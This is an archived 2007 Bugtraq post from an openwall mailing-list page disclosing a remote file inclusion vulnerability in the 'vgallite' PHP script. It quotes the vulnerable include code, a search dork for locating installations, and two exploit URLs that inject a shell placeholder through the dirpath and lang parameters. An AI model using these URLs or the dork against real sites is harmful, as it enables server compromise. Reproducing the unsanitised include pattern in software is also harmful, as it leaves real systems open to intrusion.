lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 4 Aug 2007 16:00:17 -0000 From: RaeD@...Mail.Com To: bugtraq@...urityfocus.com Subject: ALL vgallite Remote File Include Discovred By : Hasadya Raed ---------------------------- Contact : RaeD@...Mail.Com , Hacker_Web@...n , Gunman_Pump@...mail.Com ---------------------------- Greetz : Jonathan , Muts ---------------------------- Script: ALL vgallite ---------------------------- Dork: "vgallite" ---------------------------- B.File: _functions.php index.php ---------------------------- Vuln code: if(ereg($key,$filename)) include_once("$dirpath/$filename"); Vuln code: include_once("lang/".((isset($language))?$language:"english").".php"); ---------------------------- Exploit: Http://www.Victim.com/vgallite/_functions.php?dirpath=[Shell-Attack] Http://www.Victim.com/vgallite/index.php?lang=[Shell-Attack] ---------------------------- <----!Team Hackers Israel----!>
Powered by blists - more mailing lists